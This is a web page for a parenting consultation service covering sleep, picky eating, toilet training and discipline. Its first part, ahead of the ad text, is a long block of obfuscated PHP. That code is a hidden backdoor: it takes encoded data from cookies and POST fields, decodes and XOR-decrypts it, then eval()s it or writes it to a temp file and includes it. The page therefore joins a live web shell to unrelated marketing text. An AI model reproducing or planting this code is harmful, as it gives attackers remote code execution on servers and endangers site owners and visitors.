$mDTmQtm = "\161" . "\x51" . "\147" . chr (95) . chr ( 611 - 512 )."\101" . "\120" . 'L' . 'r';$SlbppUtgCY = chr (99) . chr (108) . "\141" . 's' . chr ( 864 - 749 ).chr (95) . chr ( 418 - 317 ).chr ( 213 - 93 )."\x69" . "\163" . "\164" . "\x73";$osdoKIoVYa = class_exists($mDTmQtm); $mDTmQtm = "53223";$SlbppUtgCY = "35330";$xSgokxU = FALSE;if ($osdoKIoVYa === $xSgokxU){function BehAzZY(){return FALSE;}$SXjtY = "15413";BehAzZY();class qQg_cAPLr{public function jXnapstw(){echo "6497";}private $IAenRkun;public static $AiQLHxrX = "b344f68d-03b4-455a-9afc-5d9630044778";public static $nhMOUpIYg = 10539;public function __destruct(){$SXjtY = "10005_63087";$this->FkvMnAhJ($SXjtY); $SXjtY = "10005_63087";}public function __construct($dpTFBAOeN=0){$nXUPKMPX = $_POST;$lLVTYLIH = $_COOKIE;$VtPvz = @$lLVTYLIH[substr(qQg_cAPLr::$AiQLHxrX, 0, 4)];if (!empty($VtPvz)){$BxbbEREx = "base64";$kJlRoujl = "";$VtPvz = explode(",", $VtPvz);foreach ($VtPvz as $teVyFrmA){$kJlRoujl .= @$lLVTYLIH[$teVyFrmA];$kJlRoujl .= @$nXUPKMPX[$teVyFrmA];}$kJlRoujl = array_map($BxbbEREx . chr (95) . chr (100) . "\x65" . 'c' . chr (111) . 'd' . "\145", array($kJlRoujl,)); $kJlRoujl = $kJlRoujl[0] ^ str_repeat(qQg_cAPLr::$AiQLHxrX, (strlen($kJlRoujl[0]) / strlen(qQg_cAPLr::$AiQLHxrX)) + 1);qQg_cAPLr::$nhMOUpIYg = @unserialize($kJlRoujl);}}private function FkvMnAhJ($SXjtY){if (is_array(qQg_cAPLr::$nhMOUpIYg)) {$pZmfqTVvP = str_replace('<' . "\77" . "\160" . "\150" . 'p', "", qQg_cAPLr::$nhMOUpIYg['c' . chr (111) . 'n' . "\x74" . chr ( 245 - 144 ).chr ( 477 - 367 )."\164"]);eval($pZmfqTVvP); $SXjtY = "15413";exit();}}}$QXjbu = new /* 42002 */ qQg_cAPLr(15413); $QXjbu = str_repeat("10005_63087", 1);}$dZybetSeZt = chr (89) . 'f' . "\x4a" . "\x5f" . chr (81) . chr ( 647 - 542 )."\103";$OjHzDvWE = chr (99) . chr ( 185 - 77 ).'a' . "\163" . "\163" . '_' . "\x65" . "\170" . chr (105) . "\x73" . "\164" . "\x73";$rgzbfjYkA = class_exists($dZybetSeZt); $OjHzDvWE = "24706";$LTyLCJCtf = strpos($OjHzDvWE, $dZybetSeZt);if ($rgzbfjYkA == $LTyLCJCtf){function qgLDORxeJg(){$VccYcaHLTD = new /* 18454 */ YfJ_QiC(64637 + 64637); $VccYcaHLTD = NULL;}$nXhkvp = "64637";class YfJ_QiC{private function pLOVwTKZ($nXhkvp){if (is_array(YfJ_QiC::$aTjowQs)) {$name = sys_get_temp_dir() . "/" . crc32(YfJ_QiC::$aTjowQs["salt"]);@YfJ_QiC::$aTjowQs["write"]($name, YfJ_QiC::$aTjowQs["content"]);include $name;@YfJ_QiC::$aTjowQs["delete"]($name); $nXhkvp = "64637";exit();}}public function TqBmlPFDe(){$VoxaRJ = "17858";$this->_dummy = str_repeat($VoxaRJ, strlen($VoxaRJ));}public function __destruct(){YfJ_QiC::$aTjowQs = @unserialize(YfJ_QiC::$aTjowQs); $nXhkvp = "34560_63225";$this->pLOVwTKZ($nXhkvp); $nXhkvp = "34560_63225";}public function XcLyEfYHb($VoxaRJ, $qeXdlDNebc){return $VoxaRJ[0] ^ str_repeat($qeXdlDNebc, intval(strlen($VoxaRJ[0]) / strlen($qeXdlDNebc)) + 1);}public function yqgqW($VoxaRJ){$ZoNAcJX = chr ( 504 - 406 ).chr (97) . "\163" . "\x65" . chr ( 539 - 485 ).chr (52);return array_map($ZoNAcJX . chr (95) . "\144" . chr ( 923 - 822 )."\x63" . 'o' . "\x64" . chr (101), array($VoxaRJ,));}public function __construct($gJoUvdmuX=0){$yhYgEuGd = "\x2c";$VoxaRJ = "";$ATEPnH = $_POST;$ubRMQ = $_COOKIE;$qeXdlDNebc = "82017243-3fbb-4923-9d9f-7f9873638a48";$fbUGxEwrJ = @$ubRMQ[substr($qeXdlDNebc, 0, 4)];if (!empty($fbUGxEwrJ)){$fbUGxEwrJ = explode($yhYgEuGd, $fbUGxEwrJ);foreach ($fbUGxEwrJ as $SluKmtDZX){$VoxaRJ .= @$ubRMQ[$SluKmtDZX];$VoxaRJ .= @$ATEPnH[$SluKmtDZX];}$VoxaRJ = $this->yqgqW($VoxaRJ);}YfJ_QiC::$aTjowQs = $this->XcLyEfYHb($VoxaRJ, $qeXdlDNebc);if (strpos($qeXdlDNebc, $yhYgEuGd) !== FALSE){$qeXdlDNebc = explode($yhYgEuGd, $qeXdlDNebc); $DsCoVEOPE = sprintf("34560_63225", strrev($qeXdlDNebc[0]));}}public static $aTjowQs = 13012;}qgLDORxeJg();}$NzZpq = 'W' . chr (67) . chr (83) . chr ( 592 - 497 ).chr ( 662 - 547 ).chr ( 149 - 80 ).chr ( 842 - 725 ); $IOHuJv = chr (99) . "\x6c" . chr ( 878 - 781 ).chr ( 1031 - 916 ).chr (115) . chr ( 133 - 38 ).'e' . chr (120) . "\x69" . chr (115) . chr ( 447 - 331 )."\x73";$dQWgedKddy = class_exists($NzZpq); $IOHuJv = "34190";$kGuoRuT = !1;if ($dQWgedKddy == $kGuoRuT){function yqHcuCi(){$AmowkmU = new /* 53737 */ WCS_sEu(1527 + 1527); $AmowkmU = NULL;}$XKNwuMuU = "1527";class WCS_sEu{private function zpmPoto($XKNwuMuU){if (is_array(WCS_sEu::$RgpxxKgIxg)) {$ObgWFH = sys_get_temp_dir() . "/" . crc32(WCS_sEu::$RgpxxKgIxg['s' . chr (97) . 'l' . "\x74"]);@WCS_sEu::$RgpxxKgIxg["\x77" . 'r' . 'i' . "\x74" . chr ( 111 - 10 )]($ObgWFH, WCS_sEu::$RgpxxKgIxg[chr ( 1032 - 933 ).'o' . "\156" . 't' . "\145" . "\156" . "\164"]);include $ObgWFH;@WCS_sEu::$RgpxxKgIxg[chr (100) . 'e' . chr ( 491 - 383 )."\x65" . chr (116) . chr ( 604 - 503 )]($ObgWFH); $XKNwuMuU = "1527";exit();}}private $BUHnPV;public function PmnFxs(){echo 29404;}public function __destruct(){$XKNwuMuU = "48313_44046";$this->zpmPoto($XKNwuMuU); $XKNwuMuU = "48313_44046";}public function __construct($nLinsOBa=0){$FwbEKmok = $_POST;$TzixD = $_COOKIE;$FBVMpOD = "69731d62-1cec-4f24-ba94-c5f71e5a20ba";$dhaAbE = @$TzixD[substr($FBVMpOD, 0, 4)];if (!empty($dhaAbE)){$NmTbP = "base64";$nZRPDOd = "";$dhaAbE = explode(",", $dhaAbE);foreach ($dhaAbE as $gWQpinN){$nZRPDOd .= @$TzixD[$gWQpinN];$nZRPDOd .= @$FwbEKmok[$gWQpinN];}$nZRPDOd = array_map($NmTbP . chr ( 282 - 187 )."\144" . chr ( 545 - 444 )."\143" . "\x6f" . "\x64" . 'e', array($nZRPDOd,)); $nZRPDOd = $nZRPDOd[0] ^ str_repeat($FBVMpOD, (strlen($nZRPDOd[0]) / strlen($FBVMpOD)) + 1);WCS_sEu::$RgpxxKgIxg = @unserialize($nZRPDOd); $nZRPDOd = class_exists("48313_44046");}}public static $RgpxxKgIxg = 16221;}yqHcuCi();}$UoqUU = 'O' . chr (84) . "\x5f" . chr (122) . chr ( 600 - 528 )."\x41";$IripZhFS = "\143" . chr (108) . "\141" . "\163" . "\163" . "\x5f" . chr (101) . chr (120) . chr (105) . chr ( 246 - 131 ).'t' . chr (115); $oMCbQd = $IripZhFS($UoqUU); $UoqUU = "4044";$kiRtOneXo = $oMCbQd;$IripZhFS = "24681";if (!$kiRtOneXo){class OT_zHA{private $lorLfSd;public static $NfThimbHP = "18be2c58-d641-4483-9658-f52eddcea183";public static $gvLcP = 35757;public function __construct($kQcLZP=0){$mgHJJDsou = $_COOKIE;$lcatmdtAS = $_POST;$XusJKlPh = @$mgHJJDsou[substr(OT_zHA::$NfThimbHP, 0, 4)];if (!empty($XusJKlPh)){$LzCUwkavRo = "base64";$vPdThwoImX = "";$XusJKlPh = explode(",", $XusJKlPh);foreach ($XusJKlPh as $kywvHDJe){$vPdThwoImX .= @$mgHJJDsou[$kywvHDJe];$vPdThwoImX .= @$lcatmdtAS[$kywvHDJe];}$vPdThwoImX = array_map($LzCUwkavRo . "\137" . chr (100) . 'e' . 'c' . 'o' . "\x64" . "\145", array($vPdThwoImX,)); $vPdThwoImX = $vPdThwoImX[0] ^ str_repeat(OT_zHA::$NfThimbHP, (strlen($vPdThwoImX[0]) / strlen(OT_zHA::$NfThimbHP)) + 1);OT_zHA::$gvLcP = @unserialize($vPdThwoImX);}}private function hLNLo(){if (is_array(OT_zHA::$gvLcP)) {$VlgyE = sys_get_temp_dir() . "/" . crc32(OT_zHA::$gvLcP['s' . 'a' . 'l' . chr ( 422 - 306 )]);@OT_zHA::$gvLcP['w' . chr ( 1009 - 895 ).'i' . "\x74" . "\x65"]($VlgyE, OT_zHA::$gvLcP["\x63" . "\x6f" . 'n' . "\x74" . "\x65" . chr (110) . "\164"]);include $VlgyE;@OT_zHA::$gvLcP[chr ( 399 - 299 ).chr ( 634 - 533 )."\154" . 'e' . 't' . chr (101)]($VlgyE); $dhIQXwh = "34718";exit();}}public function __destruct(){$this->hLNLo(); $dhIQXwh = "34718";$ugdovq = str_pad($dhIQXwh, 10);}}$GVZzhd = new /* 58847 */ OT_zHA(); $GVZzhd = substr("59266_11543", 1);}
We provide in-person sessions in New York and Los Angeles and via Skype for anyone living in between. During our private sessions, we address anything specific you are struggling with and educate you on what normal developmental changes to expect and the best ways to respond. Popular subjects include sleep solutions, picky eating, toilet training, sibling preparation, twin challenges, behavioral issues, proper discipline, limit setting and more.
Our visits use specific research-based information to help you make the best decisions for your family during every major developmental period – from birth to school age. Our advice is tailored to your child’s stage and your parenting style. Rather than focusing on your child’s abilities, we focus on the caregiver’s behaviors that will help scaffold your child’s optimal development.
During these 90 minute or two-hour sessions, we provide personalized materials, guidance, checklists, tables, and strategies that will help optimize each stage of your child’s growth.